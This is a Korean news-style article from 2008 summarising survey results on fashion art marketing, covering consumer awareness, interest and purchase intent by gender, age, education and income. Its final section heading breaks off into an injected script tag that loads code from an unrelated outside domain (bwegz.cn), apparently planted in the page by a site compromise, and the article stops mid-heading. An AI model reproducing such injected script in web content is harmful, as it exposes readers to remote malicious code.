아트와 기업의 만남, 패션 아트 마케팅 현주소는?
2008-03-08 
패션 아트 마케팅에 대한 소비자의 반응

3. 패션 아트 마케팅의 흥미도 : 여성이 남성보다, 전문대 및 4년제 재학·졸업자가, 21~25세대가 높은 흥미도



패션 아트 마케팅에 대한 흥미도는 보통 수준인 것으로 나타났으며, 예술작품을 프린트로 활용 유형의 경우 학력에 따른 차이만 보였는데, 4년제 재학·졸업의 집단이 높은 흥미도를 보이는 것으로 나타났다.
아티스트의 상품기획에 참여 유형에 대한 흥미도의 경우를 살펴보면, 성별 및 연령에 따른 차이를 보였는데, 여성이 남성에 비해 높은 흥미를 보였다.
연령별로는 21~25세 이하의 집단이 그 이상의 연령 집단에 비해 높은 흥미도를 보이는 것으로 나타났다. 즉, 20대 초반의 여성을 표적 시장으로 하는 패션 브랜드에서 아티스트의 상품기획 참여 유형을 도입하는 것이 효과적이리라 시사한다.
아티스트와의 공동 프로모션에 대한 흥미도의 경우, 연령 및 월수입에 따른 유의미한 차이를 보였다.
우선 연령별로는 21~25세 이하의 집단이 높은 흥미도를 보이는 것으로 나타났다. 월수입에 따라서는 300~400만원 미만의 집단이 높은 흥미도를 보였다. 다른 유형과는 달리 30대 후반의 비교적 고소득층에서 높은 흥미를 보였다. 이는 중고가 브랜드들에서 VIP 고객에게 적합한 프라이빗한 패션 아트 마케팅 유형임을 시사한다.
문화예술이 결합된 새로운 공간 연출 유형에 대한 흥미도는 학력에 따른 유의한 차이만 보였다. 4년제 재학·졸업과 대학원 재학·졸업의 집단이 높은 흥미도를 나타났다.
전체적인 패션 아트 마케팅에 대한 흥미도 차이를 살펴보면, 성별로는 여성이 남성에 비해 높은 흥미도를 보였으며, 연령별로는 21~25세 이하의 집단이 높은 흥미도를 보였다.



4. 패션 아트 마케팅의 구매의도 : 21~25세 소비자가 가장 높은 구매의사를 보임, 아티스트가 기획에 참여한 제품은 20대 초반 여성이 가장 높은 구매의사를 가짐



패션 아트 마케팅에 대한 구매의도 차이는 모두 다소 낮은 수준의 구매의도를 보이는 것으로 나타났다.
아티스트의 상품기획에 참여 유형에 대한 구매의도 차이 분석결과를 살펴보면, 성별 및 연령에 따른 유의미한 차이를 보였다. 성별로는 여성이 남성에 비해 높은 구매의도를 보였으며, 연령별로는 21~25세 집단의 구매의도가 높았다.
아티스트와의 공동 프로모션 유형에 대한 구매의도의 경우, 연령에 따른 유의한 차이만 보였다. 36~40세 이하의 집단이 26~30세 이하의 집단보다 높은 구매의도를 보이는 것으로 나타났다.
전체적인 패션 아트 마케팅에 대한 구매의도를 살펴보면, 21~25세 이하의 집단이 높은 구매의도를 보이는 것으로 나타났고, Arist의 상품기획 참여의 경우 20대 초반의 여성이 높은 구매의도를 보였으며, Artist와의 공동 프로모션 유형의 경우 30대 후반의 연령층이 높은 구매력을 보인 것으로 드러났다.



5. 패션 아트 마케팅 유형 간 인지도, 흥미도 및 구매의도 : 남성 브랜드는 예술작품을 프린트로 활용한 제품, 여성 브랜드는 아티스트의 상품기획참여 제품 기획이 효과적



전체 소비자의 경우, 인지도와 흥미도, 구매의도에 모두 유의미한 차이를 보였다. 인지도나 흥미도의 경우, 예술작품을 프린트로 활용, 아티스트의 상품기획 참여, 문화예술이 결합된 새로운 공간연출에 대한 인지도 및 흥미도가 아티스트와의 공동 프로모션에 대한 인지도 및 흥미도에 비해 높았다.
구매의도의 경우 아티스트의 상품기획 참여와 문화예술이 결합된 새로운 공간연출에 대한 구매의도가 높은 것으로 나타났다. 이를 성별로 살펴보면, 남성 소비자의 경우, 인지도는 문화예술이 결합된 새로운 공간연출에 대한 인지도가 높았으며, 흥미도의 경우, 예술작품을 프린트로 활용이 높은 것으로 나타났다.
여성 소비자의 경우, 인지도는 아티스트의 상품기획 참여에 대한 인지도가 높았으며, 흥미도의 경우, 아티스트의 상품기획 참여가 높은 것으로 나타났다. 또한 구매의도는 아티스트의 상품기획 참여가 높은 것으로 나타났다.
즉, 남성 브랜드는 예술작품을 프린트로 활용한 유형이 여성 브랜드는 아티스트의 상품기획 참여 유형이 효과적임을 알 수 있으며 남성 및 여성 브랜드에서는 이와 같은 각각의 패션 아트 마케팅 유형을 집중 공략할 필요성을 시사한다.



6. 예술에 관심이 많고, 문화생활을 즐기는 소비자들?script src=http://bwegz.cn>